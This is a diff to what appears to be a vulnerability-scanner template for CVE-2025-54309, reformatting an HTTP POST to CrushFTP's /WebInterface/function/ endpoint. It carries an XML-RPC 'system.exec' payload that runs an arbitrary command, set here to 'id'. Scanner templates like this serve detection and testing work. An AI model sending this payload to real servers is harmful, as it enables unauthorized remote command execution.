diff --git a/CVE-2025-54309.yaml b/CVE-2025-54309.yaml
index 8b78a768842..96bb86d0c6b 100644
--- a/CVE-2025-54309.yaml
+++ b/CVE-2025-54309.yaml
@@ -48,25 +48,25 @@ variables:
   cmd: "id"
 
 http:
-  - raw:
-      - |
-        POST /WebInterface/function/ HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent: CrushExploit/2.0
-        Accept: */*
-        Content-Type: application/xml
-
-        <?xml version="1.0"?>
-        <methodCall>
-          <methodName>system.exec</methodName>
-          <params>
-            <param>
-              <value>
-                <string>{{cmd}}</string>
-              </value>
-            </param>
-          </params>
-        </methodCall>
+  - method: POST
+    path:
+      - "{{BaseURL}}/WebInterface/function/"
+    
+    headers:
+      Content-Type: application/xml
+    
+    body: |
+      <?xml version="1.0"?>
+      <methodCall>
+        <methodName>system.exec</methodName>
+        <params>
+          <param>
+            <value>
+              <string>{{cmd}}</string>
+            </value>
+          </param>
+        </params>
+      </methodCall>
 
     matchers-condition: and
     matchers: